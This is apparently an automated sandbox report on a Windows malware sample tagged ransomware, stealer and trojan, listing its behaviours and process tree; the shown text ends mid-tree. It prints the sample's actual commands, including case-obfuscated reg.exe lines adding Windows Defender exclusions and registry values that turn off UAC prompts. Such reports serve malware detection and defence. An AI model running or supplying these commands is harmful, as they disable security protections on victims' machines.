14e81b55d1231669dfa1096257b4f9d3557480de44469f9ce37010220bf6676d

Analysis

max time kernel
114s
max time network
61s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
24-01-2023 19:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

S89Rydaw2q.exe
Size

23.2MB
MD5

0c952979e2d76f8ec17ff34a8023b82b
SHA1

7406c03065315f5dd6d84e9443c2f0e92a666c0a
SHA256

615beea238930be9e92faf8e7394d59d65000beb9728bb8b38f6b31c83e435e8
SHA512

6f6cb2e2606602a74a554b610c4baeb0fb6fe8b310429be330e08e6f1102ea95f36fc80fd981402e40fef652a1da5909eeb154cd4dcbd841bdbf9a0a1834278b
SSDEEP

393216:RXZVmGOIszfE1/giQkQJ/y2OFsaetMhSEiCjjngIlGZi4zym8nmjKAO9wV3ajcv1:NOm/giQP/yWaeiSEikjnRYjzMmW99IFP

Score

10^/10

discovery evasion exploit ransomware spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender notification settings 3 TTPs 3 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications\disableenhancednotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\software\microsoft\windows defender security center\notifications	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications	reg.exe

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioruser = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0"	reg.exe

Windows security bypass 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.eXereG.eXereg.eXereg.eXereG.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions	reg.eXe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\dLl = "0"	reg.eXe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\cMd = "0"	reG.eXe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\exe = "0"	reg.eXe
Key created	\REGISTRY\MACHINE\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS	reg.eXe
Key created	\REGISTRY\MACHINE\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns	reG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\sCr = "0"	reG.exe
Key created	\REGISTRY\MACHINE\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs	reG.eXe
Key created	\REGISTRY\MACHINE\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns	reg.eXe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\sYSTeM32\drIvers\etC\hOsts = "0"	reg.eXe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Executes dropped EXE 23 IoCs

Processes:

S89Rydaw2q.tmpS89Rydaw2q.tmpr.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exeobs64.exeobs64.tmpobs64.exeobs64.tmpobs64.scrobs64.sCr

pid	process
4868	S89Rydaw2q.tmp
4248	S89Rydaw2q.tmp
2748	r.exe
1372	r.exe
4608	r.exe
4932	r.exe
60	r.exe
3268	r.exe
5100	r.exe
4872	r.exe
5084	r.exe
4596	r.exe
904	r.exe
3276	r.exe
4924	r.exe
3380	r.exe
3676	r.exe
3700	obs64.exe
4944	obs64.tmp
4036	obs64.exe
4208	obs64.tmp
776	obs64.scr
5008	obs64.sCr

Possible privilege escalation attempt 5 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2524 takeown.exe
4924 icacls.exe
3376 icacls.exe
4940 icacls.exe
4756 icacls.exe
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

2536 attrib.exe
3988 attrib.exe
520 attrib.exe
1504 attrib.exe
Drops startup file 1 IoCs

Processes:

S89Rydaw2q.tmp

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\obs.lnk S89Rydaw2q.tmp
Loads dropped DLL 2 IoCs

Processes:

rundll32.exerundll32.exe

pid process

504 rundll32.exe
1172 rundll32.exe
Modifies file permissions 1 TTPs 5 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2524 takeown.exe
4924 icacls.exe
3376 icacls.exe
4940 icacls.exe
4756 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

rundll32.exeobs64.scr

pid process

1172 rundll32.exe
1172 rundll32.exe
776 obs64.scr
776 obs64.scr
776 obs64.scr
776 obs64.scr
Suspicious use of SetThreadContext 1 IoCs

Processes:

obs64.scr

description pid process target process

PID 776 set thread context of 5008 776 obs64.scr obs64.sCr
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4188 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1088 vssadmin.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1880 taskkill.exe
3936 taskkill.exe
4296 taskkill.exe

pid	process
2524	takeown.exe
4924	icacls.exe
3376	icacls.exe
4940	icacls.exe
4756	icacls.exe

pid	process
2536	attrib.exe
3988	attrib.exe
520	attrib.exe
1504	attrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\obs.lnk	S89Rydaw2q.tmp

pid	process
504	rundll32.exe
1172	rundll32.exe

pid	process
2524	takeown.exe
4924	icacls.exe
3376	icacls.exe
4940	icacls.exe
4756	icacls.exe

pid	process
1172	rundll32.exe
1172	rundll32.exe
776	obs64.scr
776	obs64.scr
776	obs64.scr
776	obs64.scr

description	pid	process	target process
PID 776 set thread context of 5008	776	obs64.scr	obs64.sCr

pid	process
4188	schtasks.exe

pid	process
1088	vssadmin.exe

pid	process
1880	taskkill.exe
3936	taskkill.exe
4296	taskkill.exe

Modifies data under HKEY_USERS 25 IoCs

Processes:

r.exer.exer.exer.exer.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	r.exe

Suspicious behavior: EnumeratesProcesses 55 IoCs

Processes:

S89Rydaw2q.tmprundll32.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exeobs64.tmpobs64.scrpowershell.exe

pid	process
4248	S89Rydaw2q.tmp
4248	S89Rydaw2q.tmp
1172	rundll32.exe
1172	rundll32.exe
1172	rundll32.exe
1172	rundll32.exe
2748	r.exe
2748	r.exe
2748	r.exe
2748	r.exe
1372	r.exe
1372	r.exe
1372	r.exe
1372	r.exe
4608	r.exe
4608	r.exe
4608	r.exe
4608	r.exe
60	r.exe
60	r.exe
60	r.exe
60	r.exe
3268	r.exe
3268	r.exe
3268	r.exe
3268	r.exe
4872	r.exe
4872	r.exe
4872	r.exe
4872	r.exe
5084	r.exe
5084	r.exe
5084	r.exe
5084	r.exe
904	r.exe
904	r.exe
904	r.exe
904	r.exe
3276	r.exe
3276	r.exe
3276	r.exe
3276	r.exe
3380	r.exe
3380	r.exe
3380	r.exe
3380	r.exe
4208	obs64.tmp
4208	obs64.tmp
776	obs64.scr
776	obs64.scr
776	obs64.scr
776	obs64.scr
4128	powershell.exe
4128	powershell.exe
4128	powershell.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

taskkill.exer.exetakeown.exetaskkill.exer.exer.exer.exer.exer.exer.exer.exer.exer.exevssvc.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1880	taskkill.exe
Token: SeDebugPrivilege	2748	r.exe
Token: SeAssignPrimaryTokenPrivilege	2748	r.exe
Token: SeTakeOwnershipPrivilege	2524	takeown.exe
Token: SeIncreaseQuotaPrivilege	2748	r.exe
Token: 0	2748	r.exe
Token: SeDebugPrivilege	3936	taskkill.exe
Token: SeDebugPrivilege	1372	r.exe
Token: SeAssignPrimaryTokenPrivilege	1372	r.exe
Token: SeIncreaseQuotaPrivilege	1372	r.exe
Token: SeDebugPrivilege	4608	r.exe
Token: SeAssignPrimaryTokenPrivilege	4608	r.exe
Token: SeIncreaseQuotaPrivilege	4608	r.exe
Token: 0	4608	r.exe
Token: SeDebugPrivilege	60	r.exe
Token: SeAssignPrimaryTokenPrivilege	60	r.exe
Token: SeIncreaseQuotaPrivilege	60	r.exe
Token: SeDebugPrivilege	3268	r.exe
Token: SeAssignPrimaryTokenPrivilege	3268	r.exe
Token: SeIncreaseQuotaPrivilege	3268	r.exe
Token: 0	3268	r.exe
Token: SeDebugPrivilege	4872	r.exe
Token: SeAssignPrimaryTokenPrivilege	4872	r.exe
Token: SeIncreaseQuotaPrivilege	4872	r.exe
Token: SeDebugPrivilege	5084	r.exe
Token: SeAssignPrimaryTokenPrivilege	5084	r.exe
Token: SeIncreaseQuotaPrivilege	5084	r.exe
Token: 0	5084	r.exe
Token: SeDebugPrivilege	904	r.exe
Token: SeAssignPrimaryTokenPrivilege	904	r.exe
Token: SeIncreaseQuotaPrivilege	904	r.exe
Token: SeDebugPrivilege	3276	r.exe
Token: SeAssignPrimaryTokenPrivilege	3276	r.exe
Token: SeIncreaseQuotaPrivilege	3276	r.exe
Token: 0	3276	r.exe
Token: SeDebugPrivilege	3380	r.exe
Token: SeAssignPrimaryTokenPrivilege	3380	r.exe
Token: SeIncreaseQuotaPrivilege	3380	r.exe
Token: SeBackupPrivilege	3112	vssvc.exe
Token: SeRestorePrivilege	3112	vssvc.exe
Token: SeAuditPrivilege	3112	vssvc.exe
Token: SeDebugPrivilege	4296	taskkill.exe
Token: SeDebugPrivilege	4128	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

S89Rydaw2q.tmpobs64.tmp

pid process

4248 S89Rydaw2q.tmp
4208 obs64.tmp
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

obs64.scr

pid process

776 obs64.scr

pid	process
776	obs64.scr

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

S89Rydaw2q.exeS89Rydaw2q.tmpcmd.exeS89Rydaw2q.exeS89Rydaw2q.tmprundll32.exeWScript.execmd.execmd.exe

description	pid	process	target process
PID 2888 wrote to memory of 4868	2888	S89Rydaw2q.exe	S89Rydaw2q.tmp
PID 2888 wrote to memory of 4868	2888	S89Rydaw2q.exe	S89Rydaw2q.tmp
PID 2888 wrote to memory of 4868	2888	S89Rydaw2q.exe	S89Rydaw2q.tmp
PID 4868 wrote to memory of 2512	4868	S89Rydaw2q.tmp	cmd.exe
PID 4868 wrote to memory of 2512	4868	S89Rydaw2q.tmp	cmd.exe
PID 4868 wrote to memory of 2512	4868	S89Rydaw2q.tmp	cmd.exe
PID 4868 wrote to memory of 2796	4868	S89Rydaw2q.tmp	S89Rydaw2q.exe
PID 4868 wrote to memory of 2796	4868	S89Rydaw2q.tmp	S89Rydaw2q.exe
PID 4868 wrote to memory of 2796	4868	S89Rydaw2q.tmp	S89Rydaw2q.exe
PID 2512 wrote to memory of 1880	2512	cmd.exe	taskkill.exe
PID 2512 wrote to memory of 1880	2512	cmd.exe	taskkill.exe
PID 2512 wrote to memory of 1880	2512	cmd.exe	taskkill.exe
PID 2796 wrote to memory of 4248	2796	S89Rydaw2q.exe	S89Rydaw2q.tmp
PID 2796 wrote to memory of 4248	2796	S89Rydaw2q.exe	S89Rydaw2q.tmp
PID 2796 wrote to memory of 4248	2796	S89Rydaw2q.exe	S89Rydaw2q.tmp
PID 4248 wrote to memory of 504	4248	S89Rydaw2q.tmp	rundll32.exe
PID 4248 wrote to memory of 504	4248	S89Rydaw2q.tmp	rundll32.exe
PID 4248 wrote to memory of 504	4248	S89Rydaw2q.tmp	rundll32.exe
PID 504 wrote to memory of 1172	504	rundll32.exe	rundll32.exe
PID 504 wrote to memory of 1172	504	rundll32.exe	rundll32.exe
PID 4248 wrote to memory of 216	4248	S89Rydaw2q.tmp	cmd.exe
PID 4248 wrote to memory of 216	4248	S89Rydaw2q.tmp	cmd.exe
PID 4248 wrote to memory of 216	4248	S89Rydaw2q.tmp	cmd.exe
PID 312 wrote to memory of 2188	312	WScript.exe	cmd.exe
PID 312 wrote to memory of 2188	312	WScript.exe	cmd.exe
PID 2188 wrote to memory of 2628	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 2628	2188	cmd.exe	reg.exe
PID 216 wrote to memory of 2748	216	cmd.exe	r.exe
PID 216 wrote to memory of 2748	216	cmd.exe	r.exe
PID 216 wrote to memory of 2748	216	cmd.exe	r.exe
PID 2188 wrote to memory of 2128	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 2128	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 4560	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 4560	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 4864	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 4864	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 4976	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 4976	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 2612	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 2612	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 1584	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 1584	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 2524	2188	cmd.exe	takeown.exe
PID 2188 wrote to memory of 2524	2188	cmd.exe	takeown.exe
PID 2188 wrote to memory of 4924	2188	cmd.exe	icacls.exe
PID 2188 wrote to memory of 4924	2188	cmd.exe	icacls.exe
PID 2188 wrote to memory of 3936	2188	cmd.exe	taskkill.exe
PID 2188 wrote to memory of 3936	2188	cmd.exe	taskkill.exe
PID 2188 wrote to memory of 3376	2188	cmd.exe	icacls.exe
PID 2188 wrote to memory of 3376	2188	cmd.exe	icacls.exe
PID 2188 wrote to memory of 1988	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 1988	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 3240	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 3240	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 3568	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 3568	2188	cmd.exe	reg.exe
PID 216 wrote to memory of 4608	216	cmd.exe	r.exe
PID 216 wrote to memory of 4608	216	cmd.exe	r.exe
PID 216 wrote to memory of 4608	216	cmd.exe	r.exe
PID 2188 wrote to memory of 4676	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 4676	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 4232	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 4232	2188	cmd.exe	reg.exe
PID 2188 wrote to memory of 5064	2188	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

1504 attrib.exe
2536 attrib.exe
3988 attrib.exe
520 attrib.exe

pid	process
1504	attrib.exe
2536	attrib.exe
3988	attrib.exe
520	attrib.exe

C:\Users\Admin\AppData\Local\Temp\S89Rydaw2q.exe
"C:\Users\Admin\AppData\Local\Temp\S89Rydaw2q.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2888

C:\Users\Admin\AppData\Local\Temp\is-7F4OG.tmp\S89Rydaw2q.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7F4OG.tmp\S89Rydaw2q.tmp" /SL5="$E007E,23846420,160256,C:\Users\Admin\AppData\Local\Temp\S89Rydaw2q.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4868

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr
3⤵
- Suspicious use of WriteProcessMemory
PID:2512

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im obs64.scr
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1880

C:\Users\Admin\AppData\Local\Temp\S89Rydaw2q.exe
"C:\Users\Admin\AppData\Local\Temp\S89Rydaw2q.exe" /verysilent /sp-
3⤵
- Suspicious use of WriteProcessMemory
PID:2796

C:\Users\Admin\AppData\Local\Temp\is-9OHR5.tmp\S89Rydaw2q.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9OHR5.tmp\S89Rydaw2q.tmp" /SL5="$F007E,23846420,160256,C:\Users\Admin\AppData\Local\Temp\S89Rydaw2q.exe" /verysilent /sp-
4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4248

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:504

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby
6⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\.cmd""
5⤵
- Suspicious use of WriteProcessMemory
PID:216

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
r.exe /Sw:0 reg.eXe Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe" /Sw:0 reg.eXe Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe" /TI/ /Sw:0 reg.eXe Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4932

C:\Windows\system32\reg.eXe
"C:\Windows\system32\reg.eXe" Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f
9⤵
- Windows security bypass
PID:3836

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
r.eXe /sW:0 reG.exe Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe" /sW:0 reG.exe Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:60

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe" /TI/ /sW:0 reG.exe Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5100

C:\Windows\system32\reG.exe
"C:\Windows\system32\reG.exe" Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f
9⤵
- Windows security bypass
PID:4388

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
r.exe /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3268

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe" /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4872

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe" /TI/ /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4596

C:\Windows\system32\reG.eXe
"C:\Windows\system32\reG.eXe" add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f
9⤵
- Windows security bypass
PID:752

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
r.eXe /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5084

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe" /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe" /TI/ /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4924

C:\Windows\system32\reg.eXe
"C:\Windows\system32\reg.eXe" Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F
9⤵
- Windows security bypass
PID:3864

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
r.exe /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3276

C:\Users\Admin\AppData\Local\Temp\is-H2OBI.tmp\temp\r.exe
